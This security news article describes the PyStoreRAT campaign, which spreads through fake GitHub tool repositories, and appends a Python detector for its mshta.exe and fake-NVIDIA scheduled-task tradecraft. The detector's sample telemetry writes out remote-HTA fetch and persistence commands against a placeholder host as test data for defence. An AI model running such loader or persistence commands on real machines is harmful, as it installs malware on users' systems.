
Hackers Hide PyStoreRAT in Fake OSINT and GPT GitHub Repos


Cybersecurity researchers have uncovered a sophisticated malware campaign exploiting GitHub-hosted Python repositories to deliver a previously undocumented JavaScript-based Remote Access Trojan (RAT) known as PyStoreRAT. This discovery highlights the growing trend of attackers abusing trusted developer platforms to distribute malicious payloads.

What Is PyStoreRAT?
PyStoreRAT is described as a modular, multi-stage implant capable of executing multiple payload formats, including:

  • EXE and DLL files
  • PowerShell scripts
  • MSI installers
  • Python and JavaScript modules
  • HTA payloads

In addition to its core capabilities, PyStoreRAT can deploy Rhadamanthys, a well-known information stealer, as a secondary payload.

How the Attack Works
The campaign leverages fake GitHub repositories disguised as OSINT tools, GPT wrappers, DeFi bots, and security utilities. These repositories often contain only a few lines of code designed to silently download a remote HTA file and execute it via mshta.exe, a legitimate Windows binary frequently abused by attackers.
Once executed, the HTA payload installs PyStoreRAT, which then:

  • Profiles the infected system
  • Checks for administrator privileges
  • Searches for cryptocurrency wallet files (Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02)
  • Scans for security tools like CrowdStrike Falcon and Cybereason to evade detection

If security products are detected, the malware modifies its execution chain to reduce visibility, launching mshta.exe via cmd.exe. Persistence is achieved through a scheduled task disguised as an NVIDIA update.

Command Capabilities
PyStoreRAT supports a wide range of malicious actions, including:

  • Downloading and executing EXE payloads (including Rhadamanthys)
  • Extracting ZIP archives
  • Loading DLLs via rundll32.exe
  • Executing JavaScript dynamically in memory
  • Installing MSI packages
  • Spawning additional HTA processes
  • Running PowerShell commands in memory
  • Spreading via removable drives using malicious LNK files
  • Removing scheduled tasks to erase forensic traces


Social Engineering and GitHub Abuse
The campaign began in mid-June 2025 and has steadily published new repositories since then. Threat actors promote these tools on YouTube and X (Twitter) and artificially inflate GitHub stars and forks—a tactic reminiscent of the Stargazers Ghost Network—to make the projects appear legitimate.
Many of these repositories are non-functional, displaying static menus or placeholder operations. This strategy exploits GitHub’s inherent trust to lure developers and analysts into executing the malicious loader stub.

Attribution and Broader Trends
While attribution remains unclear, researchers note Russian-language artifacts and coding patterns suggesting an Eastern European origin. Morphisec’s Yonatan Edri emphasizes that PyStoreRAT represents a shift toward modular, script-based implants that adapt to security controls and evade traditional EDR solutions.

Related Threat: SetcodeRat
In a separate report, QiAnXin detailed SetcodeRat, a RAT targeting Chinese-speaking regions via malvertising lures since October 2025. The malware verifies system language before proceeding and uses DLL sideloading to deploy its payload, enabling capabilities such as:

  • Keylogging
  • Screenshot capture
  • Remote command execution
  • System and network data collection


Key Takeaways for Security Teams

  • Vet GitHub repositories carefully—especially trending projects with sudden popularity.
  • Monitor for suspicious mshta.exe executions, particularly those involving remote URLs.
  • Harden against LOLBIN abuse by restricting or disabling HTA execution.
  • Watch for scheduled tasks disguised as legitimate updates.
  • Track access to cryptocurrency wallet files on endpoints.
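The detection points above (mshta.exe pulling a remote HTA, mshta.exe launched through cmd.exe, and a scheduled task dressed up as an NVIDIA update) can be expressed as a small rule pass over process-creation telemetry. The following is an added example written for this article, not code from the article's authors or from Morphisec; the record layout, the allowlisted NVIDIA install directories, the `example.invalid` URLs and every sample event are constructed assumptions rather than indicators from the campaign.

```python
# Added example: flag process-creation records matching the PyStoreRAT
# tradecraft described in the article. Field names, NVIDIA directories and all
# sample events below are constructed assumptions, not real-world indicators.
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    """Minimal process-creation record (shape of Sysmon Event ID 1 / Windows 4688)."""
    parent_image: str
    image: str
    command_line: str


REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
# schtasks.exe arguments: the value after /tn or /tr, quoted or a bare token.
TASK_NAME = re.compile(r'/tn\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
TASK_RUN = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# Assumed allowlist: where a genuine NVIDIA updater would live on a managed host.
NVIDIA_DIRS = (
    "c:\\program files\\nvidia corporation\\",
    "c:\\program files (x86)\\nvidia corporation\\",
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _arg(pattern: re.Pattern, cmd: str) -> str:
    """Return the captured argument value, or '' if the switch is absent."""
    m = pattern.search(cmd)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def detect(ev: ProcessEvent) -> List[str]:
    """Return human-readable findings for one event (empty list = nothing suspicious)."""
    findings: List[str] = []
    image, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line

    if image == "mshta.exe":
        if REMOTE_URL.search(cmd):
            findings.append("mshta.exe fetching a remote HTA")
        if parent == "cmd.exe":
            findings.append("mshta.exe launched via cmd.exe")

    if image == "schtasks.exe" and "/create" in cmd.lower():
        name = _arg(TASK_NAME, cmd).lower()
        action = _arg(TASK_RUN, cmd).strip().lower()
        # A task named like a vendor update whose action does not run from that
        # vendor's directory is the masquerade the article describes.
        if "nvidia" in name and not action.startswith(NVIDIA_DIRS):
            findings.append("scheduled task named like an NVIDIA update runs outside the NVIDIA directory")
        # First token of the action is the binary it launches (unquoted /tr values only).
        if basename(action.split(" ", 1)[0]) == "mshta.exe":
            findings.append("scheduled task action is mshta.exe")
    return findings


def scan(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map event index -> findings for every event that produced at least one finding."""
    return {i: f for i, ev in enumerate(events) if (f := detect(ev))}


# Constructed sample telemetry: one benign mshta run, two remote-HTA runs, one
# masqueraded task and one legitimate-looking NVIDIA task.
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
                 'mshta.exe "C:\\Users\\dev\\Documents\\report.hta"'),
    ProcessEvent("C:\\Python312\\python.exe", "C:\\Windows\\System32\\mshta.exe",
                 "mshta.exe http://loader.example.invalid/stub.hta"),
    ProcessEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\mshta.exe",
                 "mshta http://loader.example.invalid/stub.hta"),
    ProcessEvent("C:\\Windows\\System32\\mshta.exe", "C:\\Windows\\System32\\schtasks.exe",
                 'schtasks /create /tn "NVIDIA Update" /sc minute /mo 15 '
                 '/tr "mshta.exe http://loader.example.invalid/stub.hta"'),
    ProcessEvent("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\System32\\schtasks.exe",
                 'schtasks /create /tn "NVIDIA Display Update" /sc daily '
                 '/tr "C:\\Program Files\\NVIDIA Corporation\\Update\\nvupdate.exe"'),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {'; '.join(hits)}")
```

The rules deliberately key on behaviour (parent process, remote URL in the command line, task name versus task action) rather than on hashes or domains, since the article stresses that the loader stubs and repository names change while the mshta.exe and scheduled-task pattern stays constant. In a real deployment the allowlisted directories and the set of "vendor-sounding" task names would come from the fleet's own software inventory.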


Final Thoughts
PyStoreRAT underscores the growing risk of supply-chain attacks via trusted platforms. Developers and security teams must adopt stricter vetting processes for open-source tools and implement behavioral detection for script-based threats.
